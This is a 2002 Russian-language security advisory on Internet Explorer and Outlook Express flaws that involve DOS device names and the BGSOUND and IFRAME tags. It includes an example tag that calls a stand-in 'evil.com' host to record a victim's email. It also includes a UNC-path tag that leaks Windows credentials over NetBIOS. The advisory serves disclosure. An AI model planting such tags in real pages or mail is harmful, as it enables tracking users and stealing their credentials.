Информационная безопасность

Обзоры : доступ к специальным устройствам и DoS в Microsoft Internet Explorer/Outlook Express/Outlook
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version 





Тема:                    Доступ к специальным устройствам в Internet Explorer
Авторы:                  ERRor, 3APA3A
Дата:                    14 мая 2002
Затронуты:               Microsoft Internet Explorer 6.0
                         Microsoft Outlook Express 6.0
Производитель:           Microsoft
Опасность:               От средней до высокой
Удаленая:                Да
Воспроизводима:          Да
Производитель уведомлен: 24 Апреля 2002

Введение:

Во  всех  версиях  Windows  есть зарезервированные имена файлов, которые
относятся  к специальным устройствам (называемые так же DOS-устройства),
такие  как  prn,  aux,  nul  и  т.д. Имя устройства не зависит от пути к
каталогу,   расширения  файла  и  т.д.  (т.е.  c:\temp\prn.tmp  является
специальным  устройством  prn).  Для работы со специальными устройствами
применяется   тот   же   API  что  и  для  работы  с  обычными  файлами.
Несанкционированный  доступ  к  специальным устройствам может привести к
различным  неприятным  последствиям начиная с некорректной работы службы
или  программы,  производящей  попытку  доступа  к  файлу  и  заканчивая
повреждением физического устройства или компрометацией важных данных.

Описание проблемы:

ERRor обнаружил, что с помощью тэга <BGSOUND> в сочетании со специальным
именем  устройства  можно  вызвать  зависание  Outlook Express. При этом
возвращение  программы  в  рабочее  состояние  без  потери  архива писем
является нетривиальной задачей.

Во  время  исследования  этой проблемы было выявлено, что с помощью тэга
<IFRAME> можно послать любые данные в специальное устройство.

Так  же,  проблемой  является  то,  что  исходный  файл  тэга  <BGSOUND>
загружается  всегда  и  слюбого  сайта  независимо  от  установок  зоны
безопасности. Это делает возможным "регистрацию" клиента с помощью
<bgsound src="http://evil.com/registerme?email=victim@com.com">
Проблема получения сведений о клиенте обсуждается в [4].

Еще одна проблема, о которой сообщил Chad Loder  это то,
что используя таг типа lt;bgsound src="\\111.111.111.111\new\file.wav">
можно хаставить Internet Explorer установить внешнее NetBIOS соединение
при котором автоматически будут переданы учетные данные пользователя. Это
наиболее существенная проблема.

Использование:

В  [2] дается пример DoS-атаки против Outlook Express через <BGSOUND>. В
[3]  выводится  текстовая  строка  на  принтер подключенный к порту lpt1
через <IFRAME>.

Производитель:

Microsoft  был  проинформирован  24  апреля  2002 года. Не было получено
сообщений по данной проблеме с 25 апреля.
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород
 


Rating@Mail.ru